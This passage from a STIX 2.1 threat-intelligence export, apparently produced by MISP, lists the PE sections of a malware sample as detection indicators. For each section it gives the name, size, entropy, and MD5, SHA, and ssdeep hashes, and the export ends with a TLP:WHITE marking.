"value" : "12:E71i3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:TA1YFSlel1NzHN/m93Jl/KPN3ND" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "26d752ad-7355-4070-8ccd-b09642a166c1"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-07-15T20:05:10.000Z" ,
"modified" : "2020-07-15T20:05:10.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".reloc" ,
"category" : "Other" ,
"uuid" : "f3c0c1bf-c85a-4ba4-99a5-0373d70552cc"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "33f360e2-e3f4-4474-9fa2-fe385c72ac96"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "5.8403314710145" ,
"category" : "Other" ,
"uuid" : "965fd0bc-6b1c-418d-9c6a-419cb3ea8ad8"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "1b5b73978c9dd2b41ffb6503bbce8fa5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "68d5f823-7a9f-4c5e-9ee5-59326f0edc3e"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "8902587665c7be53c1803817feebd8982a1fce88" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7d949797-4652-4952-837c-fdb19b0654d8"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "4de7524bab0b1ee28e73af784430877e43359840645dd5382d9387f758a710c1" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "de7fa0ae-9b23-466f-b477-e2061ffca952"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "c9c576f04fe09bfea4e965418cf08009a4f41f3d29529ece5827ebf6f66b1a879211ca4e7e8e046cde9238bb09ebba817dd5ec92f1442483ef613c062e6a79fa" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "13d0a6df-7d20-44c6-8289-475d62e967a6"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "12:/qtWjpmzSlZzY1zwkUdU0UX0rojXU84jv:/qkQ2lZzY1zwDCfjX3cv" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "60b6d300-9272-4596-a355-fd46e2f39e51"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:39:23.000Z" ,
"modified" : "2020-08-02T18:39:23.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdar" ,
"category" : "Other" ,
"uuid" : "e2ec184c-a31f-4ade-ae4c-642a7e65c614"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "12288" ,
"category" : "Other" ,
"uuid" : "a9d9c4fb-0f1b-4da7-b648-4b4076d6a949"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "6.6775358173282" ,
"category" : "Other" ,
"uuid" : "ba24c52b-8652-4f97-8f8a-eac7066f35da"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "942ccd316a0ee518903e4835680d1881" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "ff4673d1-baae-4215-97d6-98ea38fa85c8"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "2e960d47a58b00b89755ed2508b9f135ed2e8b0f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "20c7e874-c65d-43ce-9182-19767af29a96"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "3bb74816-35df-4e00-ac7b-27600b25cb8f"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2acebc68-ac24-4142-bb8b-2153327f78f1"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e28799f0-ca4d-4387-8d3e-cbf555c37642"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:40:16.000Z" ,
"modified" : "2020-08-02T18:40:16.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdar" ,
"category" : "Other" ,
"uuid" : "731fc26b-ca0f-4128-9341-4c50111efd41"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "12288" ,
"category" : "Other" ,
"uuid" : "de439331-8add-4208-b003-2d4d8e2150dd"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "6.6775358173282" ,
"category" : "Other" ,
"uuid" : "fd66d66c-ac27-4030-a798-a7e93b0a541a"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "942ccd316a0ee518903e4835680d1881" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a6b0963f-0575-4067-af56-b7058a2b5b99"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "2e960d47a58b00b89755ed2508b9f135ed2e8b0f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a33a4b9f-31ce-45ec-a5f9-47f1ffc98384"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2ae21ea6-f77c-47dc-9c88-f7da7c38992d"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "9fbefbb9-f09a-4010-a067-9088c46604f1"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "4e4b35a9-f9fc-4fb9-9833-75c2b261c0d9"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:40:23.000Z" ,
"modified" : "2020-08-02T18:40:23.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdata" ,
"category" : "Other" ,
"uuid" : "7bf0f1c8-9605-4195-a8b3-6e6ea32eade6"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "118784" ,
"category" : "Other" ,
"uuid" : "bc1cbecc-7502-43c0-b231-5802452feee3"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9900939465467" ,
"category" : "Other" ,
"uuid" : "141fcc00-e7da-40f0-ab02-d471bad2c443"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "55969439752184b954d17e57a02ead13" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e1fb44e1-479d-4e34-87d2-f3ba9ec79ecd"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "630de8954270ef5ac062e63d1f0a357bf27c59e3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "680dee4f-fbb9-4410-ab4c-6298a791bb19"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "81470ab2-aff0-425a-97ad-55f1b4896bb9"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "f2f20b2d-cb5c-4781-b3c5-c7fdde33fde3"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6e091a0c-0855-40f7-add2-6c80515b795f"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:41:25.000Z" ,
"modified" : "2020-08-02T18:41:25.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rdata" ,
"category" : "Other" ,
"uuid" : "a1c86d9f-897f-48a9-a8c5-327bce630d35"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "118784" ,
"category" : "Other" ,
"uuid" : "10e6d201-dd9b-45ee-aaf8-4d1d3c0df088"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.9900939465467" ,
"category" : "Other" ,
"uuid" : "4e70dba5-9b88-4a31-9711-54b25fdecaea"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "55969439752184b954d17e57a02ead13" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5633014a-2883-4ad0-8ac8-609587d28d3a"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "630de8954270ef5ac062e63d1f0a357bf27c59e3" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "0b9dc2cf-1584-45b6-a6e3-652b330875b6"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e4a7253c-94bd-487d-a995-d65988be8b06"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5fc5c62c-d808-427f-b7fc-8ce4776bf62e"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "ed4b4255-a9ce-4c32-8ed6-259f5059c932"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:41:47.000Z" ,
"modified" : "2020-08-02T18:41:47.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".data" ,
"category" : "Other" ,
"uuid" : "2ab03bf0-15e4-4eb2-af30-92242bf54ffb"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "69632" ,
"category" : "Other" ,
"uuid" : "000942ea-74e1-43dd-959b-066f96704a0f"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.8568053112406" ,
"category" : "Other" ,
"uuid" : "97ca357e-b6b9-46c8-b15a-6008a5b3208b"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "c59b7c6bdf6d3b6475e830d444c16279" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "017f1fee-7052-44ab-a44e-fef1ea8029a6"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "4228bd6f4751581bcd745a808244e531568aba61" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "2276cac0-c9a4-4267-b95d-da9ead48dd8a"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "8142c5b2-a53b-4128-98e8-ea2ba4436b4c"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "fec67a7c-092d-4a82-b7eb-064c8bca18d9"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5f0ed13d-ba7c-460f-83bc-03d21be6ef6e"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:43:00.000Z" ,
"modified" : "2020-08-02T18:43:00.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".data" ,
"category" : "Other" ,
"uuid" : "ee88ca61-1273-40df-b15e-7c1cef7a5422"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "69632" ,
"category" : "Other" ,
"uuid" : "ae6080f0-382a-4d2e-b54b-78bbbfd6db95"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "7.8568053112406" ,
"category" : "Other" ,
"uuid" : "8f146a4a-41de-41f6-bae9-4a6a1f266488"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "c59b7c6bdf6d3b6475e830d444c16279" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "be5d5eba-b42b-4d77-88c9-200eee1782a3"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "4228bd6f4751581bcd745a808244e531568aba61" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "28495c52-a066-4c3e-9c80-e4c498da2333"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "7533d176-2922-49e4-91b5-50db38c441f8"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "959e75c1-5c91-4246-9ef3-f79bad253842"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "bb826f80-d656-4650-ad25-5871e58a5699"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--47b6935a-b4bd-4045-b600-c0a4213d3ec1" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:43:24.000Z" ,
"modified" : "2020-08-02T18:43:24.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rsrc" ,
"category" : "Other" ,
"uuid" : "992e2373-7cf4-4f4a-98a1-2fae9ceeb893"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "1c84aa0f-d3cb-4f9d-bd33-a530c005aa02"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "3.3542400671361" ,
"category" : "Other" ,
"uuid" : "51647ac3-e887-4fef-b56e-dc9a3cafd699"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "fcd1605d1d9f49547d0d1a001563946a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "8a766358-7028-4969-8feb-c5542a366574"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "ac720c8a08e4fb15215b7d2f5181f301a4bdb075" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6ee6d0a6-f0dd-430c-98b8-6b6b8c369f52"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "e2f9f32d-4c2c-43c4-bac7-c428469b6743"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "a9a39f3a-fbc1-436f-8c00-e46953d761d2"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "1de2af3c-0377-4636-914c-2b99e6e53694"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--0dbb4f9b-5415-4aba-b478-3ae76496cbc0" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:44:24.000Z" ,
"modified" : "2020-08-02T18:44:24.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".rsrc" ,
"category" : "Other" ,
"uuid" : "aea237dc-3990-42c9-a520-c16735707264"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "f9e63bb3-b550-44da-bb6e-c5273377f0a5"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "3.3542400671361" ,
"category" : "Other" ,
"uuid" : "43db1d82-3c06-4b43-be0d-ebd732243699"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "fcd1605d1d9f49547d0d1a001563946a" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "52d1185b-7538-4358-bf79-3a8df1aece8c"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "ac720c8a08e4fb15215b7d2f5181f301a4bdb075" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "8aa6dd94-f17b-43f8-8cb0-2194177bcd83"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "fbc87ccc890a8aaf2b8ded06c06da035589d67aaf9ee94e3e9b192c29e38b919" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "c3dc63c7-0999-4fa9-b354-9714660470f5"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "02fae2452b2262e7cffb798070ffd18e581664abe975738e1bbdbd6158fc73f48b7753eb5addf74715667a63e0e236d32a66daa47037ac305e7d4bf0e2e73257" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "4b1faca7-16d1-4fb2-a34a-c2ce3323da95"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "12:E7li3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:jA1YFSlel1NzHN/m93Jl/KPN3ND" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "75cfed24-ec5f-4065-8335-37cb548fb06a"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--ae062334-3a88-45b4-9331-ed9a80fc7218" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:45:01.000Z" ,
"modified" : "2020-08-02T18:45:01.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".reloc" ,
"category" : "Other" ,
"uuid" : "06dea17e-b60d-4211-8f31-8f036cfba40b"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "0de40bf8-81df-4961-86c9-4e16ff2e15e2"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "5.9461169615076" ,
"category" : "Other" ,
"uuid" : "a3ca1adf-67fa-42a8-96c1-f3cfc983eb3c"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "2e582f4b09f310087abc12cfbf505d06" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "6b061b3f-634c-4229-a9d8-cc8979311f1e"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "1d6c92f1a273c02c810e23d72d1458a6fd46fec1" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "c36c52f0-0ec1-4749-a2e1-9f2fe1fbac00"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "1018c326-f42a-4ada-bee0-6753036899c8"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "5307695d-e49d-42bc-98d1-3c309fb668ce"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "1c9fff4a-4705-4728-b3f1-25cbb0a08bf6"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "x-misp-object" ,
"spec_version" : "2.1" ,
"id" : "x-misp-object--072b4d8e-b602-458e-9a96-71242a752828" ,
"created_by_ref" : "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f" ,
"created" : "2020-08-02T18:45:51.000Z" ,
"modified" : "2020-08-02T18:45:51.000Z" ,
"labels" : [
"misp:name=\"pe-section\"" ,
"misp:meta-category=\"file\""
] ,
"x_misp_attributes" : [
{
"type" : "text" ,
"object_relation" : "name" ,
"value" : ".reloc" ,
"category" : "Other" ,
"uuid" : "f3a2141e-1665-4f09-8239-0f5f1136a6ee"
} ,
{
"type" : "size-in-bytes" ,
"object_relation" : "size-in-bytes" ,
"value" : "4096" ,
"category" : "Other" ,
"uuid" : "db905034-d0c9-473e-8e90-748edeaec6e8"
} ,
{
"type" : "float" ,
"object_relation" : "entropy" ,
"value" : "5.9461169615076" ,
"category" : "Other" ,
"uuid" : "5d4c0ee8-ddef-4bb7-8828-8e0cc15edea8"
} ,
{
"type" : "md5" ,
"object_relation" : "md5" ,
"value" : "2e582f4b09f310087abc12cfbf505d06" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "81abf6c2-3ef7-44dd-897c-e71f1f7ee662"
} ,
{
"type" : "sha1" ,
"object_relation" : "sha1" ,
"value" : "1d6c92f1a273c02c810e23d72d1458a6fd46fec1" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "ae0607e4-2deb-4276-ab36-ee504bdf95af"
} ,
{
"type" : "sha256" ,
"object_relation" : "sha256" ,
"value" : "dfb20edeecfc08005057b151980ea753dc1ed39876ff71499e877da63ad7dd9f" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "621cedb3-22b0-49d3-b41d-8aed1cf563c2"
} ,
{
"type" : "sha512" ,
"object_relation" : "sha512" ,
"value" : "9af255d70ca398f69215ad8f2549e85eafe5d61642439ddd1bf1bb298cf503945de2bf383323ddd3134ab5c1118f55b829a899cc9cfdc03b31c57d50914a5107" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "39882cc0-0ea1-44ec-8532-90ab9ca93fc6"
} ,
{
"type" : "ssdeep" ,
"object_relation" : "ssdeep" ,
"value" : "6:CsgX5b8UT8rcdGLqdRvuagySjR8MC5lBNVpstehJJt1pMazEeJkFB/il:CsgjTvdVdduajfMMlzI8dIae4l" ,
"category" : "Payload delivery" ,
"to_ids" : true ,
"uuid" : "d92abd90-8a08-44e9-b5f5-3ce18363dacc"
}
] ,
"x_misp_meta_category" : "file" ,
"x_misp_name" : "pe-section"
} ,
{
"type" : "marking-definition" ,
"spec_version" : "2.1" ,
"id" : "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ,
"created" : "2017-01-20T00:00:00.000Z" ,
"definition_type" : "tlp" ,
"name" : "TLP:WHITE" ,
"definition" : {
"tlp" : "white"
}
}
]
}